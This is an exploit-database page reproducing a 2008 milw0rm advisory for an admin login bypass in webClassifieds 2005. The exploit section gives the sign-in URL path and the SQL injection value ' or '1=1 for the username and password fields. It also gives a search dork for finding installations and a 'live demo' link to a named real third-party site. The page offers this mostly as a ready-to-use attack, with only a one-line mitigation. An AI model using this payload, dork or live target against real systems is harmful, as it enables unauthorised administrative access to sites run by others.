header-logo
Suggest Exploit
vendor:
webClassifieds™© 2005
by:
AnGeL25dZ
3.3
CVSS
LOW
Admin Bypass
N/A
CWE
Product Name: webClassifieds™© 2005
Affected Version From: webClassifieds™© 2005
Affected Version To: webClassifieds™© 2005
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

webClassifieds™© 2005 Admin Login Bypass vulnerability

An attacker can bypass the authentication process of webClassifieds™© 2005 by entering ' or '1=1 as the username and password.

Mitigation:

Upgrade to the latest version of webClassifieds™© 2005
Source

Exploit-DB raw data:

************************************************************
** 		 webClassifieds™© 2005 Admin Login Bypass vulnerability
************************************************************
**  Prodcut:		webClassifieds™© 2005    
**  Home   : 		http://www.webscribble.com/
**  Vunlerability :		Admin Bypass
**  Risk  :			low
**  Dork : 		"powered by webClassifieds"
************************************************************
** Discovred by:	AnGeL25dZ
** From	       :	Constantine - Algeria
** Contact     : 	angel25dz@gmail.com	
** *********************************************************
** Greetz to :	 ALLAH 
**		 All Members of HackTeachTeam    http://www.hackteach.org/
** 		 cold zero, Ra3ch, His0k4
************************************************************
**  Exploit:
**  http://[PATH]//classifieds/index.php?page=sign_in
**
**  user :              admin      /        user :           ' or '1=1
**  password :     ' or '1=1   /        password:    ' or '1=1
**  
****************************************************************
** Live demo : http://www.towpartners.com/classifieds/index.php?page=sign_in
****************************************************************

# milw0rm.com [2008-12-29]

Navigation

Suggest Exploit

Services By CQR